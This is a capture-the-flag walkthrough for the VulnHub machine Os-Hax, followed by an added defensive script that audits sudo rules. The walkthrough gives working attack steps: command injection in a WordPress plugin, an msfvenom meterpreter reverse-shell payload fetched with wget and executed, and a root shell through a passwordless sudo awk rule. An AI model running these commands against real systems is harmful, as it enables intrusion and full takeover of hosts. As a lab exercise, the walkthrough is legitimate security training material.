Os-Hax Walkthrough: VulnHub CTF

Today we are solving Os-Hax, a CTF designed by Rahul Gehlaut.

You can download it here. (Os-Hax Walkthrough)

Level: Intermediate

Boot to Root

Tools Used

  •  Netdiscover
  •  Dirb
  •  Nmap
  •  ExifTool
  •  Metasploit

First of all, find the target's IP address. We did this using the Netdiscover command.

Next, we continue to our second step: scanning the target with an Nmap aggressive scan.

nmap  -A

We found ports 22 and 80 (HTTP) open.

Enter the machine's IP in the web browser.

Without wasting time, enumerate the directories with Dirb.

Dirb found some directories. Navigate to the following URL:

There we find our first flag.

Now download the image file flaghost.png.

Data Exfiltration-Steganography

After downloading the image, extract the data embedded in it.

The next hint we find is a directory: [email protected]

After opening the directory, we find Flag2.txt.

Open the file Flag2.txt.

It contains Brainfuck-encoded text.

After decoding it, we find a WordPress password.

Decoder website: https://www.splitbrain.org/_static/ook/

Username: web

Password: [email protected]

The next step is to add an entry to the hosts file.

vi /etc/hosts

After adding my CTF IP and localhost, save the file.

Then open the following URL to find a WordPress page.


Without wasting time, open the WordPress login panel.

Log in with the password we already found.

After logging in to WordPress, we find a vulnerable plugin: Activity Manager.

Opening the Activity Manager tool, we find a command injection.

Let's check it with the command |id

And this works: after the command, I see the output.

Having confirmed that the command injection works, we create our payload with Metasploit.

msfvenom -p php/meterpreter/reverse_tcp lhost= lport=4545 -f raw

Open the vi editor and save the output text as payload.php.

Create a Python server:

python -m SimpleHTTPServer

Use the wget command to download our payload to the target machine.

First, use Inspect Element to change maxlength=15 to 100, then run | wget

Execute our payload with this command: | php payload.php

use exploit/multi/handler
set payload php/meterpreter/reverse_tcp
set lhost
set lport 4545

And we got a reverse connection.

First, use Python to spawn a proper shell.

python -c 'import pty;pty.spawn("/bin/bash")'
cd /home
cd web

and I see our 3rd flag

cat flag.txt

Privilege Escalation

To find the 4th flag we need to escalate to root privileges. Let's identify the sudo rights for Alice with the help of the following command.

sudo -l

So here Alice can run awk as root without a password, and we can easily spawn a root shell by exploiting this permission.

sudo /usr/bin/awk 'BEGIN {system("/bin/bash")}'
cd /root
cat final.txt

FLAG 4: COMPLETE! Congratulations
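
The root cause of the last step is a sudo rule for a program that can run other commands. As an added example (not part of the original walkthrough), this shell function audits `sudo -l` output for such rules on your own hosts; the RISKY list is an illustrative assumption, and the sample output with the names alice and ctfbox is constructed.

```shell
#!/bin/sh
# Added example: audit `sudo -l` output for rules that amount to full root.
# RISKY is an illustrative, non-exhaustive list (an assumption of this example)
# of programs that can execute other commands, like the awk rule on this page.
RISKY="awk gawk mawk nawk find vi vim less more man env perl python python3 ruby tar sed ed sh bash"

# audit_sudo_l: reads `sudo -l` output on stdin and prints one line per risky
# rule as SEVERITY|runas|command. HIGH means no password is required.
audit_sudo_l() {
    awk -v risky="$RISKY" '
    BEGIN { n = split(risky, r, " "); for (i = 1; i <= n; i++) bad[r[i]] = 1 }
    # Rule lines start with the run-as spec, e.g. "(root) NOPASSWD: /usr/bin/awk"
    /^[ \t]*\(/ {
        line = $0
        sub(/^[ \t]*/, "", line)
        runas = substr(line, 1, index(line, ")"))
        rest = substr(line, index(line, ")") + 1)
        nopw = 0
        n = split(rest, cmds, ",")
        for (i = 1; i <= n; i++) {
            c = cmds[i]
            # Tags (NOPASSWD:, PASSWD:, SETENV:, ...) persist until overridden.
            while (match(c, /^[ \t]*[A-Z_]+:/)) {
                tag = substr(c, RSTART, RLENGTH); gsub(/[ \t:]/, "", tag)
                if (tag == "NOPASSWD") nopw = 1
                if (tag == "PASSWD") nopw = 0
                c = substr(c, RSTART + RLENGTH)
            }
            gsub(/^[ \t]+|[ \t]+$/, "", c)
            split(c, w, " ")                 # w[1] is the program path
            k = split(w[1], p, "/"); base = p[k]
            if (w[1] == "ALL" || base in bad)
                printf "%s|%s|%s\n", (nopw ? "HIGH" : "MEDIUM"), runas, c
        }
    }'
}

# Constructed sample of `sudo -l` output (user and host names are made up).
SAMPLE='User alice may run the following commands on ctfbox:
    (root) NOPASSWD: /usr/bin/awk
    (root) /usr/bin/systemctl restart apache2, NOPASSWD: /usr/bin/less /var/log/syslog
    (ALL : ALL) PASSWD: /usr/bin/find'

# On a real host: sudo -l | audit_sudo_l
printf '%s\n' "$SAMPLE" | audit_sudo_l
```

Any HIGH finding should be replaced with a narrowly scoped wrapper script or removed, since the listed program gives the user an unrestricted root shell.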

Author Name: Rahul Gehlaut
